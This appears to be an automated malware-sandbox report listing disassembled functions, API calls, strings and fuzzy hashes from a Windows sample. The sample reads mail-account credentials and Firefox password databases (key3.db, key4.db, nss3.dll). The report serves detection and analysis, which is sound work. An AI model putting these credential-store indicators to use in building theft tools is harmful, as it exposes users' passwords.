                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7618E430,?), ref: 004081B9
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                  • API String ID: 524865279-2190619648
                                                                                                                  • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                  • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                  Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406B8E
                                                                                                                  • strlen.MSVCRT ref: 00406B99
                                                                                                                  • strlen.MSVCRT ref: 00406BFF
                                                                                                                  • strlen.MSVCRT ref: 00406C0D
                                                                                                                  • strlen.MSVCRT ref: 00406BA7
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                  • String ID: key3.db$key4.db
                                                                                                                  • API String ID: 581844971-3557030128
                                                                                                                  • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                  • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                  • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                  • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                  Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2300387033-3849865405
                                                                                                                  • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                  • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                  Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004076D7
                                                                                                                  • sprintf.MSVCRT ref: 00407704
                                                                                                                  • strlen.MSVCRT ref: 00407710
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                  • strlen.MSVCRT ref: 00407733
                                                                                                                  • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                  • String ID: %s (%s)
                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                  • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                  • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                  Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                  Strings
                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                  • API String ID: 1640410171-3316789007
                                                                                                                  • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                  • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                  • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                  • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                  Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$memsetsprintf
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 125969286-791839006
                                                                                                                  • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                  • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                  Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                    • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                  • String ID: ACD
                                                                                                                  • API String ID: 1886237854-620537770
                                                                                                                  • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                  • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                  Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004091EC
                                                                                                                  • sprintf.MSVCRT ref: 00409201
                                                                                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                  • API String ID: 2923679083-4161923789
                                                                                                                  • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                  • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                  Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                  Strings
                                                                                                                  • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                  • no such savepoint: %s, xrefs: 00426A02
                                                                                                                  • unknown error, xrefs: 004277B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                  • API String ID: 3510742995-3035234601
                                                                                                                  • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                  • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                  • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                  • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                  Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                  • API String ID: 2221118986-3608744896
                                                                                                                  • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                  • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                  • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                  • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                  Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                    • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                  • API String ID: 1784268899-4153596280
                                                                                                                  • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                  • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                  • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                  • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                  Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                  • memset.MSVCRT ref: 00410246
                                                                                                                  • memset.MSVCRT ref: 00410258
                                                                                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                  • memset.MSVCRT ref: 0041033F
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                  • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974772901-0
                                                                                                                  • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                  • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                  Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0044406C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                  • strlen.MSVCRT ref: 004440D1
                                                                                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                  • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 577244452-0
                                                                                                                  • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                  • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                  Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • _strcmpi.MSVCRT ref: 00404518
                                                                                                                  • _strcmpi.MSVCRT ref: 00404536
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$memcpystrlen
                                                                                                                  • String ID: imap$pop3$smtp
                                                                                                                  • API String ID: 2025310588-821077329
                                                                                                                  • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                  • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                  Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C02D
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2726666094-3614832568
                                                                                                                  • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                  • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                  Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403A88
                                                                                                                  • memset.MSVCRT ref: 00403AA1
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                  • strlen.MSVCRT ref: 00403AE9
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1786725549-0
